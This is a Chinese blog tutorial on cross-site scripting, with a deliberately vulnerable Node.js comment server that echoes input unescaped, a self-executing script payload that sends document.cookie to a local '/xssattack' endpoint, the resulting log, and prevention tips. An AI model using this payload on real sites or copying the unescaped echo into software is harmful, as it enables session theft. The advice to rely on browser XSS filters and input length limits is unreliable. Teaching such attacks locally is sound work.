XSS 攻击原理、实战、预防
作者: dkvirus 发表于: 2018-06-25 15:41:00 最近更新: 2018-08-02 00:03:45

一、原理

常见攻击场景:在论坛或博客的下方经常会有留言功能,输入内容:测试数据,留言内容会被一个 h 标签包裹,F12 控制台会打印:

留言数据

现在在下方留言 测试数据</h><script>alert('xss test')</script><h> ,F12 控制台可以看到我们自己写的脚本通过简单伪装就被植入到该网站,关键是直接看页面压根看不出啥变化。

XSS 攻击

这里的脚本比较简单,如果对脚本稍加修改,比如自执行函数,页面打开时自动运行;让脚本会获取 浏览器保存的用户登录密码,再通过一些手段发送给攻击者,那么攻击者就成功盗取用户账号。

举个栗子:假设简书上上某一篇文章下方评论里被攻击者注入了攻击脚本,其它用户只要打开这篇文章,攻击脚本自动执行,将打开该文章的用户身份信息发送给攻击者。那么攻击者就可以使用当前登录用户的简书账号密码去做坏事了…….

二、实战

使用 node 作为服务器提供论坛下方评论功能,模拟 XSS 攻击过程。

假设你计算机安装了 node 环境,拷贝下方内容,保存为 index.js。node index.js 运行服务,在浏览器输入 localhost:3000/ 回车。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
// index.js
const http = require('http');
const fs = require('fs');
const url = require('url');

const server = http.createServer(function (req, res) {
if (req.url === '/favicon.ico') {
return;
}
const parseUrl = url.parse(req.url, true);

console.log('>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>')
console.log(parseUrl)

// 路由1 /uploadForm 提交表单处理方法,在页面显示刚才表单内填写的内容
// 路由2 /xssattack xss 攻击接收浏览器发来的 cookie 接口
// 路由3 / 返回一个表单
if (parseUrl.pathname === '/uploadForm') {
res.writeHead(200, {'content-Type':'text/html;charset=UTF-8'})
const username = parseUrl.query.username;
res.write(`<h>${username}</h>`);
res.end();
} else if (parseUrl.pathname === '/xssattack') {
res.writeHead(200, {'content-Type':'text/html;charset=UTF-8'})
const pw = parseUrl.query.pw;
res.write(`i received message:${pw}`)
res.end();
} else {
res.writeHead(200, {'content-Type':'text/html;charset=UTF-8', 'Set-Cookie': 'myCookie=test'})
res.write(`
<form method="get" action="/uploadForm">
<input type="text" style="width: 600px;" placeholder="输入用户名" name="username">
<button type="submit">提交</button>
</form>
`)
res.end();
}
});

server.listen(3000, function () {
console.log('server is starting on port 3000');
});

该服务提供了三个接口。

  • localhost:3000/ node 服务器返回一个表单页面;
  • localhost:3000/uploadForm 表单提交按钮处理方法,将表单文本框中内容打印到页面上;
  • localhost:3000/xssattack 攻击脚本获取到当前登录用户的身份信息,如账号密码,或者 cookie 等,发送到攻击者自己的服务器上。

这里提供一份攻击脚本,作用是获取当前登录用户的 cookie,然后发送给攻击者自己服务器上某个接口。直接复制内容到表单文本框中。

1
测试数据</h><script>(function () {var str = document.cookie;var a =document.createElement('a');a.setAttribute('id', 'xxlkjxljklxjklfasdf');a.href='http://localhost:3000/xssattack?cookie='+str;document.body.appendChild(a);document.getElementById('xxlkjxljklxjklfasdf').click();})()</script><h>

攻击脚本源码(仅供参考,为什么获取 cookie 不直接获取账号密码,以及使用 a 标签跳转的方式在浏览器地址栏会暴露等等问题,这里都不做解释,这里仅是模拟 XSS 攻击的过程):

1
2
3
4
5
6
7
8
9
10
11
// 攻击脚本自执行函数:获取 cookie,发送给攻击者服务器 localhost:3000/xssattack
<script>
(function () {
var str = document.cookie;
var a =document.createElement('a');
a.setAttribute('id', 'xxlkjxljklxjklfasdf')
a.href='http://localhost:3000/xssattack?cookie='+str
document.body.appendChild(a);
document.getElementById('xxlkjxljklxjklfasdf').click()
})()
</script>

在表单中输入包含注入脚本的伪装评论:

表单中输入脚本代码

点击提交,在终端可以看到下方打印消息。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Url {
protocol: null,
slashes: null,
auth: null,
host: null,
port: null,
hostname: null,
hash: null,
search: '?cookie=myCookie=test',
query: { cookie: 'myCookie=test' },
pathname: '/xssattack',
path: '/xssattack?cookie=myCookie=test',
href: '/xssattack?cookie=myCookie=test' }

验证浏览器中 cookie 是否正确:

浏览器控制台打印 Cookie

到此,攻击者就获取到登录用户的 Cookie,用了 cookie 就可以冒充当前登录用户去做些坏事了。当然这里获取账号密码更直接,在发送的使用邮件或其他方式都可以,保证隐蔽性。

三、预防

XSS 攻击如此神出鬼没,关键是在页面上看不出任何差异,如何防范它呢?

3.1 对于普通用户

普通用户没有编程基础,不太能识别 XSS 攻击,建议使用谷歌浏览器,谷歌浏览器自带检测网站 XSS 攻击功能,如果谷歌浏览器检测到您当前访问的页面存在 XSS 攻击,不会运行注入脚本,会报错提示:

谷歌浏览器自带 XSS 检测功能

我在火狐浏览器也做了下测试,发现火狐并不会检测 XSS 攻击脚本。(这里不是黑火狐,目前火狐主打的是访问速度,对安全这块可能并没有太多关注)

3.2 对于网站站长

虽然 XSS 攻击并不会直接对网站造成影响,但是它总是盗取登录该网站用户的账号密码,搞不好哪天你的用户烦心了,不用这个网站了,网站丢失用户量是件很可怕的事。

  • 预防一:对于评论、文章内容等做转码操作

    将评论、文章等取数据内容做转码,将 < 转码为 &lt;> 转码为 &gt;,此时在浏览器中就可以看到注入脚本无处可藏,显露原型了。这也是目前使用比较广泛的一种,楼主测试了一下 码云 是否有 XSS 漏洞,发现它就是这种预防措施的。

    对评论内容做 html 转码

  • 预防二:对表单内容做长度校验

    有些前端开发人员不注意安全,表单内文本框或文本域都不做长度校验,这就存在 XSS 攻击风险。上面也提到注入脚本一般长度很长,聪明一些的攻击者会将注入脚本进行压缩缩短长度。如果你的文本框长度只允许输入 10 个字符,嫩它注入脚本再厉害也是无计可施的。

    image.png

首页
友链
归档
dkvirus
动态
RSS